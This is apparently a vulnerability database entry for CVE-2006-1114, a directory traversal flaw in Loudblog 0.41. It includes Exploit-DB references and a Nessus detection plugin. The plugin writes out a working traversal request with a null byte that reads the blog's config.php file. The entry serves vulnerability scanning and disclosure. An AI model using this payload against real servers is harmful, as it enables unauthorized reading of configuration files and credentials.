CVE-2006-1114 - Input Validation vulnerability in Gerrit VAN Aaken Loudblog 0.41

CVSS 6.4 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: NONE

Tags: network, low complexity, gerrit-van-aaken, nessus, exploit available

Summary

Multiple directory traversal vulnerabilities in Loudblog before 0.42 allow remote attackers to read or include arbitrary files via a .. (dot dot) and trailing %00 (NULL) byte in the (1) template and (2) page parameters in (a) index.php, and the (3) language parameter in (b) inc/backend_settings.php. This vulnerability affects Loudblog versions 0.41 and previous.

Vulnerable Configurations

Part         Description        Count
Application  Gerrit_Van_Aaken   1

Exploit-Db

  • description: LoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access. CVE-2006-1114. Webapps exploit for php platform
    id: EDB-ID:27369
    last seen: 2016-02-03
    modified: 2006-03-07
    published: 2006-03-07
    reporter: tzitaroth
    source: https://www.exploit-db.com/download/27369/
    title: LoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access
  • description: LoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access. CVE-2006-1114. Webapps exploit for php platform
    id: EDB-ID:27370
    last seen: 2016-02-03
    modified: 2006-03-07
    published: 2006-03-07
    reporter: tzitaroth
    source: https://www.exploit-db.com/download/27370/
    title: LoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access

Nessus

NASL family: CGI abuses
NASL id: LOUDBLOG_042.NASL
description: The remote host is running Loudblog, a PHP application for publishing podcasts and similar media files. The version of Loudblog installed on the remote host fails to sanitize input to the
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 21024
published: 2006-03-08
reporter: This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/21024
title: Loudblog < 0.42 template Parameter Traversal
code:
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(21024);
  script_version("1.19");

  script_cve_id("CVE-2006-1114");
  script_bugtraq_id(17023);

  script_name(english:"Loudblog < 0.42 template Parameter Traversal");
  script_summary(english:"Tries to read Loudblog's config file");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from an
information disclosure vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host is running Loudblog, a PHP application for publishing
podcasts and similar media files.

The version of Loudblog installed on the remote host fails to sanitize
input to the 'template' parameter of the 'index.php' script before
returning the contents of the file in a dynamic web page.  An
unauthenticated attacker can exploit this issue to view arbitrary
files on the affected system subject to the privileges of the web
server user id.

In addition, there reportedly is also a local file include flaw
involving the 'language' and 'page' parameters of the
'inc/backend_settings.php' and 'index.php' scripts and a SQL injection
flaw involving the 'id' parameter of the 'podcast.php' script, although
Nessus has not tested for these other issues.

Successful exploitation of these issues reportedly requires that PHP's
'magic_quotes_gpc' be disabled." );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/426973/30/0/threaded" );
  script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20061212174522/http://www.loudblog.de:80/forum/viewtopic.php?id=592" );
  script_set_attribute(attribute:"solution", value:
"Upgrade to Loudblog 0.42 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/08");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/03/07");
  script_cvs_date("Date: 2018/11/15 20:50:17");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/loudblog", "/podcast", "/podcasts", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Grab config.php.
  file = "../../../loudblog/custom/config.php";
  w = http_send_recv3(method:"GET", 
    item:string(
      dir, "/index.php?",
      "template=", file, "%00"
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if...
  if (
    # it looks like Loudblog and...
    "Loudblog built this page" >< res &&
    # it looks like the config file.
    "$lb_path" >< res
  ) {
    content = res - strstr(res, "<!-- Loudblog built this page");
    if (isnull(content)) content = res;

    report = string(
      "\n",
      "Here are the contents of Loudblog's config file that\n",
      "Nessus was able to read from the remote host :\n",
      "\n",
      data_protection::sanitize_user_full_redaction(output:content)
    );

    security_warning(port:port, extra:report);
    exit(0);
  }
}